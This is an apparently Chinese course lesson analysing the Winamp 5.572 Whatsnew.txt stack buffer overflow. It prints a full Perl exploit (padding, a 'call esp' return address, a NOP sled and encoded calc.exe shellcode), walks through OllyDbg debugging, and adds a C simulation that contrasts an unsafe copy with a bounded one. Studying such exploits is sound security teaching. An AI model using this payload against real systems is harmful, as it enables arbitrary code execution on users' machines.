Buffer Overflow Analysis, Lesson 10: A Study of the Winamp Buffer Overflow


Buffer Overflow Analysis is the set of lecture notes for the video course of the same name that I recorded for ichunqiu (www.ichunqiu.com). Each time I finish writing the notes for a lesson, I record the lesson by following the document. The series starts from scratch, so that buffer overflow vulnerabilities are explained in an easy-to-digest way. The course combines theory and practice: after every few lessons of basic theory, a real piece of software is analysed so that you can better understand how the vulnerability works. Interested readers can use this article together with the accompanying video.
Preface

Winamp is a classic music player that appeared in the late 1990s. The music player landscape is very different today, but back then Winamp was practically the only choice for listening to music, as anyone who used a computer in that era will remember. Even today a group of loyal Winamp fans still hold out, which shows that the player still has plenty of life in it.

The software also has a great many vulnerabilities of various kinds, covering many areas. The one discussed here is a buffer overflow in the way Winamp reads Whatsnew.txt, the file that holds its update history.

Vulnerability Replay

The normal Whatsnew.txt lives in the Winamp folder and holds the program's update history. To reproduce the vulnerability, overwrite that file with a specially constructed whatsnew.txt, start Winamp, and choose "About Winamp" under Help on the menu bar:


Figure 1

In the dialog that pops up, select "Version history":


Figure 2

The vulnerability is then triggered. According to its description, the whatsnew.txt found on the Internet should launch the Calculator, but in my own tests it sometimes worked and sometimes did not. That is quite normal: exploit files found online often have problems of one kind or another, so we need to debug this one ourselves and work out how the file exploits the bug.

Exploit Code Analysis

Now that we have triggered the vulnerability, we can analyse its cause further. Let's look at the POC code, which is written in Perl:

my $version = "Winamp 5.572";
my $junk = "\x41" x 540;
my $eip = "\xad\x86\x0e\x07";   # overwrite EIP with 0x070E86AD: FFD4 (call esp) in nde.dll
my $nop = "\x90" x 100;
my $shellcode =                  # windows/exec CMD=calc.exe, alphanumeric-encoded
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x78\x69\x6b\x4c\x6a".
"\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e".
"\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54".
"\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64".
"\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f".
"\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f".
"\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d".
"\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44".
"\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35".
"\x4c\x4e\x6b\x34\x41\x6a\x4b\x6c\x49\x33\x6c\x35\x74\x64\x44\x4a".
"\x63\x34\x71\x4b\x70\x63\x54\x6e\x6b\x71\x50\x76\x50\x4f\x75\x4b".
"\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57".
"\x6c\x6c\x6d\x6e\x6b\x75\x38\x54\x48\x58\x6b\x73\x39\x6e\x6b\x4b".
"\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63".
"\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59".
"\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73".
"\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63".
"\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33".
"\x30\x47";
open(myfile, '>>whatsnew.txt');   # note: appends, so delete any old whatsnew.txt first
print myfile $version.$junk.$eip.$nop.$shellcode;
print "[+] whatsnew.txt written.\n";
print "[] now copy it to your Winamp folder...\n";
print "[] Run Winamp and hit [About Winamp]->[Version history]\n";

Look first at the fourth statement from the bottom: it sets out the format of the exploit file, which has five parts, version + junk + eip + nop + shellcode. version is the software version being targeted, 5.572 here; junk is the padding, 540 bytes of 0x41 (capital A), whose job is to push the next field onto the saved return address; eip is the value we overwrite the return address with, 0x070E86AD, written little-endian as "\xad\x86\x0e\x07"; nop is 100 bytes of 0x90; and finally comes the shellcode.

Debugging the vulnerability

To debug the vulnerability we can work with the constructed whatsnew.txt. First locate where the vulnerability occurs, then set breakpoints at the appropriate places and analyse from there. In earlier lessons we set breakpoints on a function such as strcpy and analysed around the breakpoint, or did the same around a function such as fopen. There are many ways to go about this, and almost any of them will get us there. For this program we already know that it opens a file named whatsnew.txt, so we may as well search for that string in the program and start the analysis from there.

First load Winamp.exe in OllyDbg (OD), right-click in the disassembly pane and choose "Search for" -> "All referenced text strings":

Figure 3

Then select the topmost entry so that the search starts from the beginning. Right-click, choose "Search for text", enter the string we are looking for, "Whatsnew.txt", and click OK:


Figure 4

There are two results in total, so we can look at each of them in turn. The two instructions may not themselves be the ones that pass the file name to fopen, but that does not matter; the fopen call should not be far away. Double-click the first result to jump to its disassembly, then look above and below that position for the suspected file-open call:


Figure 5

Set a breakpoint at 0x004015EE, press F9 to let the program run, and trigger the vulnerability as described above; the program then stops at 0x004015EE. First malloc is called to request 0x20000 bytes of memory; its return value is the address of the allocated block, 0x0286C008 in my session. Then _wfopen is called to open Whatsnew.txt, followed by a call to fread:


Figure 6

From the parameters of this call we can see that fread reads the file contents into the space just allocated. Then strncmp is used for a comparison:


Figure 7

Here the first 9 characters of the Whatsnew.txt that was read in are checked against "Winamp 5.", and only if they match does the next step proceed. This explains why the exploit code has to start with the version information. Next comes the most important point, the string copy:


Figure 8

Here the content read from Whatsnew.txt is copied to the address 0x00BDEBAC. Step over this function with F8 and have a look:


Figure 9

The contents of our whatsnew.txt have now been written into the current stack space, and 0x00BDEDD4 is the location of the original return address. That slot is 0x228 = 552 bytes past the start of the copy, which is exactly the 12-byte version string plus the 540 bytes of junk, so the four bytes that follow the junk land precisely on the return address. Now go straight to the location the return address points at:


Figure 10

You can see that the program is using the call ESP technique. At this moment ESP holds 0x00BDEDE8, which is 0x14 bytes past the return-address slot and therefore 0x10 bytes into the 0x90 NOP sled; behind the NOPs is the shellcode.
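The layout worked out above (12-byte version string, 540 bytes of junk, return address at +552, ESP landing in the NOP sled at +572) can be checked without Winamp at all. The following C program is an added example written for this lesson; it is not code from the article, from the PoC author or from Winamp. It rebuilds the five-part file that the Perl PoC writes, models the vulnerable path seen in Figures 7 to 9 (a 9-byte strncmp gate followed by an unbounded string copy into a fixed-size stack buffer) against a simulated stack, and puts a bounded loader beside it. The offsets and the 0x070E86AD return address come from the article; everything else is an assumption made for the demonstration: the 552-byte buffer size is inferred from the distance between 0x00BDEBAC and 0x00BDEDD4, the 0x14-byte gap between the return slot and ESP from the debugger values, and the placeholder shellcode, the 4 KB simulated frame and the sentinel return value are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Offsets taken from the lesson's debugger session: the copy destination
 * 0x00BDEBAC and the saved return address slot 0x00BDEDD4 are 0x228 = 552
 * bytes apart, and ESP was 0x00BDEDE8 after the ret, 0x14 bytes past the slot. */
#define VERSION_TAG  "Winamp 5.572"
#define VERSION_LEN  (sizeof(VERSION_TAG) - 1)    /* 12 */
#define RET_OFFSET   552u                         /* version + 540 bytes of junk */
#define ESP_OFFSET   (RET_OFFSET + 0x14u)         /* where "call esp" will land */
#define JUNK_LEN     (RET_OFFSET - VERSION_LEN)   /* 540, as in the Perl PoC */
#define NOP_LEN      100u
#define FAKE_RET     0x070E86ADu                  /* call esp in nde.dll, from the PoC */
#define FRAME_SIZE   4096u                        /* simulated stack (constructed) */
#define SENTINEL     0xDEADBEEFu                  /* stand-in for the real return address */

static void write_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v);
    p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16);
    p[3] = (unsigned char)(v >> 24);
}

static uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Build the same five-part file the Perl PoC writes: version+junk+eip+nop+shellcode.
 * Returns the number of payload bytes (the terminating NUL is not counted),
 * or 0 if `cap` is too small. */
size_t build_whatsnew(unsigned char *out, size_t cap,
                      const unsigned char *sc, size_t sclen)
{
    size_t total = VERSION_LEN + JUNK_LEN + 4 + NOP_LEN + sclen;
    unsigned char *p = out;
    if (total + 1 > cap) return 0;
    memcpy(p, VERSION_TAG, VERSION_LEN);  p += VERSION_LEN;
    memset(p, 'A', JUNK_LEN);             p += JUNK_LEN;
    write_le32(p, FAKE_RET);              p += 4;     /* "\xad\x86\x0e\x07" */
    memset(p, 0x90, NOP_LEN);             p += NOP_LEN;
    memcpy(p, sc, sclen);                 p += sclen;
    *p = '\0';                            /* a string copy stops here */
    return total;
}

/* The vulnerable path seen in Figures 7-9: a 9-byte strncmp gate, then an
 * unbounded copy of the whole file into a fixed-size stack buffer. `frame`
 * models that stack: bytes [0, RET_OFFSET) are the buffer and the four bytes
 * at RET_OFFSET are the saved return address. */
int history_load_unsafe(const unsigned char *file, unsigned char *frame)
{
    if (strncmp((const char *)file, "Winamp 5.", 9) != 0) return -1;
    strcpy((char *)frame, (const char *)file);   /* BUG: length never checked */
    return 0;
}

/* Hardened form: same gate, but the copy is bounded by the buffer size and an
 * oversized entry is rejected instead of overrunning (or silently truncating). */
int history_load_safe(const unsigned char *file, unsigned char *frame)
{
    const unsigned char *nul;
    if (strncmp((const char *)file, "Winamp 5.", 9) != 0) return -1;
    nul = (const unsigned char *)memchr(file, '\0', RET_OFFSET);
    if (nul == NULL) return -2;                  /* no terminator inside the buffer */
    memcpy(frame, file, (size_t)(nul - file) + 1);
    return 0;
}

struct probe {
    int      rc;         /* loader return code */
    uint32_t saved_ret;  /* what now sits in the return-address slot */
    int      esp_byte;   /* byte at the address ESP holds after the ret */
};

/* Feed the PoC-shaped file to one of the loaders and report what happened. */
struct probe probe_loader(int use_safe)
{
    unsigned char frame[FRAME_SIZE];
    unsigned char file[1024];
    unsigned char sc[32];            /* constructed placeholder: int3s, not the PoC's payload */
    struct probe r = { -99, 0, 0 };

    memset(sc, 0xCC, sizeof sc);
    if (build_whatsnew(file, sizeof file, sc, sizeof sc) == 0) return r;
    memset(frame, 0, sizeof frame);
    write_le32(frame + RET_OFFSET, SENTINEL);    /* plant the "return address" */
    r.rc = use_safe ? history_load_safe(file, frame)
                    : history_load_unsafe(file, frame);
    r.saved_ret = read_le32(frame + RET_OFFSET);
    r.esp_byte  = frame[ESP_OFFSET];
    return r;
}

int main(void)
{
    struct probe u = probe_loader(0), s = probe_loader(1);
    printf("unsafe: rc=%d  return slot=0x%08x  byte at ESP=0x%02x\n",
           u.rc, (unsigned)u.saved_ret, u.esp_byte);
    printf("safe:   rc=%d  return slot=0x%08x  byte at ESP=0x%02x\n",
           s.rc, (unsigned)s.saved_ret, s.esp_byte);
    return 0;
}
```

Compile with cc -std=c99 -Wall and run: the unsafe loader reports the return slot now holding 0x070E86AD and a 0x90 at the address ESP will hold after the ret, while the bounded loader rejects the oversized file with -2 and leaves the sentinel untouched. Note that a C string copy also stops at the first NUL byte, so a NUL anywhere before the shellcode would cut the overwrite short; that is one reason the PoC uses an alphanumeric-encoded payload.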

Our goal here is not to work out why the original shellcode only sometimes runs; if you are interested you can investigate that yourself. Instead we can swap in the shellcode we have used in earlier lessons and see whether that gives the expected result. Whatsnew.txt can be edited with a hex editor:


Figure 11

Then trigger the vulnerability again:


Figure 12

As you can see, our exploit succeeds.

Summary

This lesson analysed a vulnerability starting from someone else's shellcode. As we saw, even code from experienced people does not necessarily work as advertised. So we have to keep experimenting and studying, learning from the ideas of others in order to keep improving.

